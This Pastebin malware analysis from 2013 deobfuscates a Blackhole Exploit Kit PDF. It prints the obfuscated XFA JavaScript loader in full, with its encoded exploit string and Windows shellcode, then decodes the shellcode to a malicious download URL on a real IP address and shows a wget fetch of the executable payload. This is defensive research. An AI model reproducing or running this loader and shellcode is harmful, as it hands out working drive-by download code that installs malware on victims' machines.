API tools faq
paste
MalwareMustDie

Guide to crack payload2 BHEK2/ 20120103 #MMD

MalwareMustDie
Jan 3rd, 2013
1,486
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 14.87 KB | None | 0 0
raw download clone embed print report
  1. ======================================================================
  2. #MalwareMustDie - @unixfreaxjp ~]$ date
  3. Thu Jan  3 16:12:47 JST 2013
  4. ----------------------------------------------------------------------
  5. // In the "other" PDF of new obfs'edBHEK reported/tweeted at:
  6. // https://twitter.com/MalwareMustDie/status/286587621080182784
  7. // https://twitter.com/MalwareMustDie/status/286593203459747840
  8. //
  9. // PDF file data:
  10. // Date        Time   Size   Name      MD5
  11. //2013/01/03  05:22  10,053 b264b.pdf a9480ade56f5631bbc7eb4f71093a3ac
  12. //
  13. // at 0x13E5-x23AC You'll see the Java Script coded below:
  14. -----------------------------------------------------------------------
  15. <BLAH!>
  16.    :
  17. <xfa:script contentType='application/x-javascript'>
  18.  rawd='4E@83J4A1648@23J3M3M41@5463P274E@73J4A163K@03K3K1I16@33L3L3L1I@9163M3M3M@21I163N3N@53N1I163O@63O3O1I16@13P3P3P1I@116404040@3274E3J4A@616484741@8464C3N4A@14B3H3J1I@31641274E@23J4A164G@916291646@93N4F162D@74A4A3J4H@41E1F274E@93J4A164H@816291646@03N4F162D@34A4A3J4H@81E1F274E@83J4A163H@9441N2918@5203L1O1M@7221M1M3O@81M211N23@9241M203J@41P3L1O1M@7221M1M3O@11M3O221P@8241M203J@63J1P3N3K@3241M203J@51P1M1O1M@2241O203J@5223N1O3O@7241M203J@7201N201N@1201N201N@71O221M1M@81M1M1M1M@41M1M1M1M@01M1M1M1M@01M1M1M1M@61M1M1M1M@91M1M1M1M@61M1M1M1M@51N1O1P25@9241M203J@722201O1M@0221M1M3O@71M1M1M20@71M1M1M1M@9201N201N@4201N201N@7201N201N@9201N201N@5181H4A3J@34F3M1O1K@74A3N4844@73J3L3N1E@11L271L3P@51I1D1D1F@0274E3J4A@9163H441O@82918203L@71O1M221M@61M3O3J21@7221P241M@9203J1P3L@31O1M221M@81M3O2522@51O1N241M@5203J251M@01N3O241M@3203J1P1M@6251M2420@6203J233M@0233N241M@5203J201N@5201N201N@0201N1O22@51M1M1M1M@31M1M1M1M@21M1M1M1M@91M1M1M1M@21M1M1M1M@11M1M1M1M@71M1M1M1M@51M1M231N@02424241M@6203J2220@91O1M221M@61M3O1M1M@81M201M1M@81M1M201N@6201N201N@6201N201N@6201N201N@5201N181H@74A3J4F3M@11O1K4A3N@348443J3L@43N1E1L27@91L3P1I1D@31D1F273H@8441P293J@54848273H@044202946@03N4F162D@34A4A3J4H@71E1F273O@14D463L4C@841474616@23H44211E@51F4J4E3J@94A163H44@422293H44@61P1K4E41@63N4F3N4A@2383N4A4B@94147461K@44C47354C@14A41463P@51E1F273H@34422293H@944221K4A@33N48443J@13L3N1E1D@71K1D1I1D@81D1F274F@84041443N@81E3H4422@21K443N46@43P4C4028@7201F3H44@7221H291D@41M1D274A@53N4C4D4A@94616483J@54A4B3N2L@8464C1E3H@744221I1N@81M1F4L3O@64D463L4C@941474616@33H44231E@53H44241I@63H44251F@94J4F4041@4443N1E3H@844241K44@83N463P4C@0401G1O28@93H44251F@53H44241H@3293H4424@0274A3N4C@84D4A4616@43H44241K@74B4D3K4B@94C4A4146@43P1E1M1I@73H44251L@11O1F4L3O@94D463L4C@541474616@83H2L1M1E@33H2L1N1F@24J3H2L1N@0294D463N@84B3L3J48@03N1E3H2L@71N1F274A@6474C3N2G@83J43293H@82L1N1K44@93N463P4C@5401G1O27@43M3J4334@1474C3N29@14D463N4B@23L3J483N@11E1D1B4D@2251M251M@31D1F274B@7484A3J4H@7293H4423@31E3M3J43@734474C3N@21I1M4G1O@01M1M1M1J@64A474C3N@82G3J431F@82744474G@939403N3N@7293H2L1N@51H4B484A@03J4H2744@3474G3940@93N3N293H@044231E44@1474G3940@13N3N1I21@91O201M25@0241F273O@9474A1E41@7291M2716@141162816@6201M1M27@216411H1H@41F3H4420@83D413F29@644474G39@6403N3N1K@24B4D3K4B@04C4A1E1M@51I44474G@939403N3N@51K443N46@43P4C401J@31N1F1H3M@83J433447@14C3N274L@23O4D463L@84C414746@2163H2L1O@91E3H2L1N@51I443N46@21F4J4F40@241443N1E@43H2L1N1K@4443N463P@64C402844@53N461F3H@32L1N1H29@83H2L1N27@64A3N4C4D@14A46163H@12L1N1K4B@24D3K4B4C@54A41463P@61E1M1I44@23N461F4L@33O4D463L@44C414746@4163H2L1P@31E3H2L1N@11F4J4A3N@64C291D1D@1273O474A@51E41291M@92741283H@92L1N1K44@83N463P4C@34027411H@7291O1F4J@13K293H2L@31N1K4B4D@43K4B4C4A@51E411I1O@71F273L29@8483J4A4B@03N2L464C@51E3K1I1N@3221F274A@33N4C1H29@5354C4A41@1463P1K3O@64A47452F@7403J4A2F@3473M3N1E@13L1F274L@54A3N4C4D@84A46164A@53N4C4L3O@94D463L4C@441474616@03H42411N@21E3H2L1N@01I3H2L20@11F4J3H2L@721291D1D@2273O474A@21E3H2L22@8291M273H@52L22283H@12L1N1K44@93N463P4C@040273H2L@5221H1H1F@44J3H4425@0293H2L20@51K443N46@43P4C4027@53H2L2329@03H2L1N1K@03L403J4A@32F473M3N@12D4C1E3H@62L221F27@03H2L2429@53H2L201K@83L403J4A@72F473M3N@32D4C1E3H@52L221B3H@644251F27@73H2L211H@729354C4A@041463P1K@03O4A4745@12F403J4A@72F473M3N@21E3H2L23@33G3H2L24@51F274L4A@93N4C4D4A@746163H2L@6214L3O4D@0463L4C41@44746163H@32L251E3H@02L221F4J@03H421M29@93H2L221K@74C47354C@04A41463P@91E1N221F@2273H421N@2293H421M@61K443N46@43P4C4027@93H2L2129@61E3H421N@11B1O1F2B@41D1M1D1H@33H421M26@93H421M27@34A3N4C4D@04A46163H@92L214L3O@34D463L4C@141474616@73H421O1E@73H2L1N1F@74J3H2L21@4291D1D27@73O474A1E@43H2L2229@11M273H2L@922283H2L@81N1K443N@4463P4C40@1273H2L22@01H291O1F@34J3H2L21@01H291D1B@14D1D273H@52L211H29@33H2L251E@53H2L1N1K@33L403J4A@72F473M3N@42D4C1E3H@92L221H1N@91F1F273H@02L211H29@23H2L251E@83H2L1N1K@33L403J4A@42F473M3N@82D4C1E3H@72L221F1F@64L4A3N4C@74D4A4616@63H2L214L@33O4D463L@14C414746@3163H421P@91E1F4J3H@44220293H@444211E1F@727413O1E@03H422028@5251M1M1M@81F4J3H42@621291D47@61H4D2D35@1423P3P3P@143484D2O@9202E2N1L@61L1L1L1L@44F2D2D2D@82D2E2D2D@22D2D2D2D@52D2D2D2D@72D2D332D@22D2D2D2D@92D2D2D3O@8403J2D35@5412D3P3B@32D25242H@62L2E2N1D@4273H4222@9293H441N@5273H4223@1293H2L1P@41E3H4222@61F4L3N44@64B3N4J3H@34221291D@3432E1H2D@135424133@3402H4825@33O472E2N@61L1L1L1L@31L4F2D2D@12D2D2E2D@42D2D2D2D@42D2D2D2D@42D2D2D33@32D2D2D2D@02D2D2D2D@83B4G2F2D@235412D3P@43B2D1L3O@32H202E2N@11D273H42@622293H44@41O273H42@923293H2L@11P1E3H42@8221F4L3H@74224291D@835374349@72D2G3P3P@22D2D2E2E@91D273H42@425293H2L@11O1E1D33@7372I2E1D@71I1N1M25@424201F27@83H44441M@0291D3333@93L2D2D2D@72H2G2D2D@32H2D2D2D@12D4F2L2D@12D2D2D33@92H2G2D2D@52H2D2D2D@72D2E2D2D@12D2D2D4F@62H2G2D2D@12H2D2D2D@52D2E2D2D@12D2D2E3P@42H2G2D2D@12H2D2D2D@62D2E2D2D@42D2D2H33@52H2H2D2D@42H2D2D2D@12D2L2D2D@32D2D2I4F@32H2H2D2D@62H2D2D2D@42D4F2L2D@92D2D372D@72H2G2D2P@14F2D2D2D@72F352L2D@12D2D2D2D@22D2D2D2D@92D2P2G2D@2421L1L1L@91L1L1D27@53H44441N@5293H4224@01H3H4225@41H3H4444@31M1H3H42@921273H44@6441O293H@142411N1E@03H42231I@31D1D1F27@2413O1E3H@544441O1K@7443N463P@04C401B1O@11F3H4444@21O1H294D@6463N4B3L@43J483N1E@71D1B1M1M@21D1F273H@044441P29@13H421O1E@13H44441O@71F274F41@44C401E4J@043263H44@0441P4L1F@63H2L1M1E@0431F272L@5453J3P3N@52I413N44@53M1N1K4A@03J4F383J@8444D3N29@13H44441N@54L3H421P@91E1F27';
  19.  rawd2='6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f39332e3139302e34342e3137372f636c6f736573742f3938796638393133666a6970676a69616c6867383233396a676967686e6a683469366b356f2e7068703f696e686f713d33303a316e3a31693a31693a333326796f6f726d7576653d316b3a31663a32773a316d3a33313a316f3a316c3a316c3a33303a3331267563623d3169266671747a65683d6c6f666670267077656a663d6369727063640000';
  20. tt="t"+"a"+"rg";
  21. with(event){
  22. ev=/*123123*/"ev"/*/renyaerz*/;
  23. ev+="a";
  24. l="l";
  25. t=target;
  26. ev+=l;
  27. cr='ti';
  28. cr2='au';
  29. cr2+='th';
  30. cr3='sp';
  31. cr3+='l';
  32. cr4='rep';
  33. cr4+='l';
  34. if(event.name==='Ini'+'t'){
  35.     cr+=/*%#!%#!*/'t';
  36.     k=t[ev];
  37.     cr+='le';
  38.     cr2+='or';
  39.     cr3+='it';
  40.     a=rawd;}
  41. }
  42. s="";
  43. z=a;
  44. str="Str";
  45. str+="i";
  46. str+="ng";
  47. ss=(k)?k(str):12;
  48. cr4+='ace';
  49. ff="f1r2o3m4C5h6a7r8C9o0d1e"[cr4](/[0-9]+/g,'');
  50. pp="par";
  51. ss=ss[(k)?ff:0];
  52. pp+=ss(115,101,73,110,116);
  53. q=t[pp];
  54. xz=a.length;
  55. for(i=0;xz&gt;i;i=2+i){
  56.     i2=i+1;
  57.     if (z[i]!='@')
  58.     if(event.name==='Ini'+'t')s+=(ss(q(z[i]+z[i2],26)));
  59. }
  60. z=xvasvs=s;
  61. k(z);
  62.  
  63. </xfa:script>
  64.    :
  65.  
  66.  
  67. // It is using malicious JS/Command im scattered strings,
  68. // The usage of the /* comment */ to confuse the deobfuscator
  69. // The usage of the event & target to manipulate the eval's output
  70. // My tip is: be smart!
  71. // At the top you saw the rawd strings which is the obfs'ed exploit code,
  72. // and following by the rawd2, which at the glance I know it as a shellcode-
  73. // format, well, in my case I just hit the shellcode :-)
  74. // for obfuscating the exploit code you need to make it simple with following tip:
  75. // 1. make the code simple, merge the scattered command, join the /*comment*/
  76. // 2. re-code all variable related to the event & target
  77. // 3. In the end just document.write(z); or eval(z); <-- key of the deobfs.
  78.  
  79.  
  80. // see the rawd2 well, see the combination strings of
  81. // "68 74 74 70 3A 2F 2F 39" and "00 00" in the end suggesting me
  82. // a hidden url is in there...
  83.  
  84. 6683E4FCFC85E47534E95F33C0648B40308B400C8B701C568B760833DB668B5E3C0374332C81EE1510FFFF
  85. B88B4030C346390675FB87342485E47551E9EB4C51568B753C8B74357803F5568B762003F533C94941FCAD
  86. 03C533DB0FBE1038F27408C1CB0D03DA40EBF13B1F75E65E8B5E2403DD668B0C4B8D46ECFF54240C8BD803
  87. DD8B048B03C5AB5E59C3EB53AD8B6820807D0C33740396EBF38B68088BF76A0559E898FFFFFFE2F9E80000
  88. 000058506A4068FF0000005083C01950558BEC8B5E1083C305FFE3686F6E00006875726C6D54FF1683C408
  89. 8BE8E861FFFFFFEB02EB7281EC040100008D5C240CC7042472656773C744240476723332C7442408202D73
  90. 205368F8000000FF560C8BE833C951C7441D0077706274C7441D052E646C6CC6441D0900598AC104308844
  91. 1D0441516A006A0053576A00FF561485C075166A0053FF56046A0083EB0C53FF560483C30CEB02EB134780
  92. 3F0075FA47803F0075C46A006AFEFF5608E89CFEFFFF8E4E0EEC98FE8A0E896F01BD33CA8A5B1BC6467936
  93. 1A2F70687474703A2F2F39332E3139302E34342E3137372F636C6F736573742F3938796638393133666A69
  94. 70676A69616C6867383233396A676967686E6A683469366B356F2E7068703F696E686F713D33303A316E3A
  95. 31693A31693A333326796F6F726D7576653D316B3A31663A32773A316D3A33313A316F3A316C3A316C3A33
  96. 303A3331267563623D3169266671747A65683D6C6F666670267077656A663D6369727063640000
  97.  
  98. // save the strings into the binary and save it as text
  99.  
  100. // in hex..,
  101.  
  102. 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 DB
  103. 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4
  104. 75 51 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B 76 20 03 F5 33 C9 49 41 FC AD 03
  105. C5 33 DB 0F BE 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 E6 5E 8B 5E 24 03 DD 66
  106. 8B 0C 4B 8D 46 EC FF 54 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB 53 AD 8B 68 20
  107. 80 7D 0C 33 74 03 96 EB F3 8B 68 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 00 00
  108. 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00
  109. 00 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF FF FF EB 02 EB 72 81 EC 04 01 00 00
  110. 8D 5C 24 0C C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 44 24 08 20 2D 73 20 53 68
  111. F8 00 00 00 FF 56 0C 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D 05 2E 64 6C 6C C6
  112. 44 1D 09 00 59 8A C1 04 30 88 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 85 C0 75
  113. 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA
  114. 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01
  115. BD 33 CA 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F 2F 39 33 2E 31 39 30 2E 34 34
  116. 2E 31 37 37 2F 63 6C 6F 73 65 73 74 2F 39 38 79 66 38 39 31 33 66 6A 69 70 67 6A 69 61
  117. 6C 68 67 38 32 33 39 6A 67 69 67 68 6E 6A 68 34 69 36 6B 35 6F 2E 70 68 70 3F 69 6E 68
  118. 6F 71 3D 33 30 3A 31 6E 3A 31 69 3A 31 69 3A 33 33 26 79 6F 6F 72 6D 75 76 65 3D 31 6B
  119. 3A 31 66 3A 32 77 3A 31 6D 3A 33 31 3A 31 6F 3A 31 6C 3A 31 6C 3A 33 30 3A 33 31 26 75
  120. 63 62 3D 31 69 26 66 71 74 7A 65 68 3D 6C 6F 66 66 70 26 70 77 65 6A 66 3D 63 69 72 70
  121. 63 64 00 00
  122.  
  123. // in ASCII...
  124.  
  125. fƒäüü…äu4é_3Àd‹@0‹@.‹p.V‹v.3Ûf‹^<.t3,.î..ÿÿ¸‹@0ÃF9.uû‡4$…äuQéëLQV‹u<‹t5x.õV‹v .õ3ÉIAü­
  126. 3Û.¾.8òt.ÁË..Ú@ëñ;.uæ^^$.Ýf‹.K.FìÿT$.‹Ø.Ý‹.‹.Å«^YÃëS­‹h €}.3t.–ëó‹h.‹÷j.Yè˜ÿÿÿâùè....
  127. XPj@hÿ...PƒÀ.PU‹ì‹^.ƒÃ.ÿãhon..hurlmTÿ.ƒÄ.‹èèaÿÿÿë.ër.ì.....\$.Ç.$regsÇD$.vr32ÇD$. -s Shø...ÿV.‹è
  128. 3ÉQÇD..wpbtÇD...dllÆD...YŠÁ.0ˆD..AQj.j.SWj.ÿV.…Àu.j.SÿV.j.ƒë.SÿV.ƒÃ.ë.ë.G?.uúG€?.uÄj.jþÿV
  129. .èœþÿÿŽN.ì˜þŠ.‰o.½3ÊŠ[.ÆFy6./phttp://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4
  130. i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=
  131. cirpcd..
  132.  
  133.  
  134. //You'll see the below url in the end of the garbled strings ;-)
  135.  
  136. http://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd
  137.  
  138. // fetch it:
  139.  
  140. --15:48:34--  http://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd
  141.            => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@inhoq=30%3A1n%3A1i%3A1i%3A33&yoormuve=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd'
  142. Connecting to 93.190.44.177:80... seconds 0.00, connected.
  143.  
  144. ---request begin---
  145. GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd HTTP/1.0
  146. Referer: http://google.com/url?
  147. User-Agent: #MalwareMustDie is changing the lock of The Moronz's front gate...
  148. Accept: */*
  149. Host: 93.190.44.177
  150. Connection: Keep-Alive
  151.   :
  152. HTTP request sent, awaiting response...
  153.   :
  154. HTTP/1.1 200 OK
  155. Server: nginx/1.2.6
  156. Date: Thu, 03 Jan 2013 06:48:28 GMT
  157. Content-Type: application/x-msdownload
  158. Content-Length: 73728
  159. Connection: keep-alive
  160. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  161. Pragma: public
  162. Expires: Thu, 03 Jan 2013 06:48:34 GMT
  163. Cache-Control: must-revalidate, post-check=0, pre-check=0
  164. Cache-Control: private
  165. Content-Disposition: attachment; filename="calc.exe"
  166. Content-Transfer-Encoding: binary
  167.   :
  168. 200 OK
  169. Registered socket 1920 for persistent reuse.
  170. Length: 73,728 (72K) [application/x-msdownload]
  171. 100%[====================================>] 73,728        45.57K/s
  172. 15:48:37 (45.49 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@inhoq=30%3A1n
  173. %3A1i%3A1i%3A33&yoormuve=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&ucb=1i&
  174. fqtzeh=loffp&pwejf=cirpcd' saved [73728/73728]
  175.  
  176. // let's save it as calc.exe and here we are:
  177.  
  178. Date        Time   Size   Name     MD5
  179. ------------------------------------------------------------------------
  180. 2013/01/03  15:48  73,728 calc.exe aed9ac49b10a75d54f37079b18c11153
  181. ------------------------------------------------------------------------
  182. Just as per expected, same payload:
  183.  
  184. SHA1:   e6561522623e3aff12f806bed88eb326b78af7e1
  185. MD5:    aed9ac49b10a75d54f37079b18c11153
  186. File size:  72.0 KB ( 73728 bytes )
  187. File name:  info.exe
  188. File type:  Win32 EXE
  189. Tags:   peexe
  190. Detection ratio:    8 / 45
  191. Analysis date:  2013-01-02 22:25:55 UTC ( 8 時間, 28 分 ago )
  192. url: https://www.virustotal.com/file/b9c4b1ecaa15631735cd56ac3c70a2492b2ebc052aa1b3187178765e508e2678/analysis/
  193.  
  194.  
  195. ------
  196. "For the sweat and tears of the tireless InfoSec Researcher who fights against malware.."
  197.    "we dedicated our expose to restore the purity of internet!"
  198.       Non nobis domine, non nobis, sed nomini tuo da gloriam!"
  199.  
  200.                    #MalwareMustDie
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!